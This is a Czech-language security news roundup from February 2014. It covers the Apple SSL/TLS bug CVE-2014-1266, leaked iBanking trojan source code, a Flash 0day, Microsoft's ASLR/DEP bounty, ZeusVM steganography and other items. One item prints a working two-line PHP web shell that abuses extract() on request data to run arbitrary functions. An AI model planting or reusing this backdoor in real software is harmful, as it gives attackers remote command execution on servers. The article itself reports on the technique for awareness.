Hlavní navigace

Postřehy z bezpečnosti: kritické aktualizace, o kterých byste měli vědět

24. 2. 2014
Doba čtení: 4 minuty

Sdílet

V dnešním díle Postřehů se podíváme na kritickou chybu iOS zařízení a OS X systému, 0day chybu v Adobe Flash, informaci o potřebě aktualizovat i HW v našich domácnostech, komu dal Microsoft 100 tisíc dolarů, novou variantu bankovního trojana Zeus, novou formu PHP backdooru, podivné výběrové řízení FBI a mnoho dalšího.

Byla vydána aktualizace pro všechna iOS zařízení 7.0.6 a 6.1.6 opravující kritickou chybu (CVE-2014–1266) při zpracování SSL/TLS spojení umožňující převzít jakékoliv šifrované spojení mezi klientem a serverem. Adam Langley na svém webu podrobně popisuje chybu včetně ukázky chybného kódu. Tato chyba zřejmě postihuje i OS X do verze 10.9.1 a opravné balíčky pro OS X již byly uvolněny (použijte App Store pro ověření). Pokud dokážete navštívit tuto testovací stránku pomocí Safari, tak je váš systém napadnutelný.

Pokročilý bankovní trojský kůň pro Android zařízení s názvem iBanking, o kterém jsme informovali již dříve, je teď mnohem větší hrozbou. Byly volně ke stažení jeho zdrojové kódy serverové části obsahující i modul pro sestavení mobilního klienta. Připomeňme, že tento malware má schopnost odposlouchávat SMS zprávy, kterými se většinou zasílá autentizační kód pro přístup k vašemu bankovnímu účtu.

Tým lidí ze společnosti FireEye objevil další 0day chybu v Adobe Flash postihující všechny jeho současné verze/větve. Bohužel byl tento exploit již spatřen na několika webech a je tak více než doporučeno ihned aktualizovat na poslední verzi.

Pokud chcete vědět, jaké všechny komponenty, knihovny či aplikace na vašem počítači obsahují bezpečnostní chybu a je potřeba je aktualizovat, doporučuji používat Secunia PSI.

Facebook koupil společnost WhatsApp za 19 miliard dolarů. Více než o aplikaci šlo samozřejmě o její komunitu čítající 450 milionů uživatelů (jejich údajů a čísel). Jednoduchým počtem dojdeme k tomu, že Facebook odhadl cenu jednoho uživatele na 42 dolarů. Pro bezpečné zasílání zpráv byste však měli používat spíše TextSecure nebo Threema.

Brian Krebs na svém webu popisuje důležitost aktualizací nejen vašeho počítače, ale také všech vašich zařízení komunikujících se sítí (televize, HTPC, WiFi router, ledničky, …). Je známo, že spousta automatizovaných botů hledá právě takováto zařízení a ihned se snaží využít známých slabin, aby se pak i toto zařízení stalo součástí botnetu. Jeden z botnetů tvořený právě těmito zařízeními čítal sto tisíc.

Microsoft minulý rok spustil bug bounty program zaměřený jen na obcházení ochran ASLR (Address Space Layout Randomization) a DEP (Data Execution Prevention). Již minulý rok měl Yang Yu prezentaci na CanSecWest popisující obcházení ASLR a DEPu bez ROP (Return Oriented Programming), což je nejběžnější postup. Jako poslední také dostal 100 000 dolarů tímto bug bounty programem, když zaslal tři různé vzorky kódu obcházející sandbox. Na tomto webu se můžete podívat, kolik různých bug bounty programů existuje.

Jedna z variant bankovního trojana Zeus, zvaná ZeusVM, používá steganografii, kdy je seznam bank, na které se má zaměřit, uložen v obrázku.

Google koupil startup SlickLogin používající dvoufaktorovou autentizaci zajímavým způsobem. Pro přihlášení do systému či aplikace použijete aplikaci na svém mobilu, která začne vysílat kód na vyšší frekvenci (neslyšitelné lidským sluchem) a tím se tak uživatel úspěšně ověří. Podobně jako si BadBIOS měl vyměňovat data mezi počítači. Pokud váš počítač nemá mikrofon, tak je možné použít i NFC, Bluetooth, WiFi nebo QR kódy. Zajímavé řešení.

Nová forma PHP backdooru chytře využívá možností funkce extract() ke spuštění systémových příkazů, čímž se zcela vyhýbá klasickým funkcím, jako je system, eval, passthru apod.

@extract ($_REQUEST);
@die ($ctime($atime));

FBI vypsala výběrové řízení na obří skladiště malware. Cílem je mít co možná nejširší a nejaktuálnější seznamy malwaru potulujícího se po internetu. Nad tímto skladem by následně měla být vybudována laboratoř pro výzkum bezpečnostních hrozeb. FBI přitom není žádný břídil a chce mít opravdu vše – od hrozeb pro Windows počínaje, přes Linux až po javascriptové a PHP technologie. Třeba NSA pošle i zdrojové kódy :)

Článek sice staršího data, ale o to kvalitnější. Jedná se o popis první chyby v Internet Explorer 11 64-bit na Windows 8.1. Rozhodně by neměl uniknout žádnému bug-hunterovi.

Nekomerční konference Security Session má to potěšení pozvat všechny zájemce 5. dubna (sobota) na další ročník. V této chvíli sestavujeme program konference a přednášek a chtěli bychom takto i požádat čtenáře PzB, aby nás kontaktovali na info (zavináč) security-session.cz pokud by měl někdo zájem přednášet na konferenci. Budeme se těšit!

root_podpora

Ve zkratce

Pro pobavení

The NSA is the only branch of the government that actually listens to people.

Závěr

Tento seriál vychází střídavě za pomoci konzultantů firmy Datasys, příznivců a redaktorů serveru Security-Portal.cz. Uvítali bychom i vaši spolupráci na tvorbě obsahu tohoto seriálu. Pokud byste nás chtěli upozornit na zajímavý článek, tak nám napište na FB stránku, případně na Twitter. Děkujeme.

Byl pro vás článek přínosný?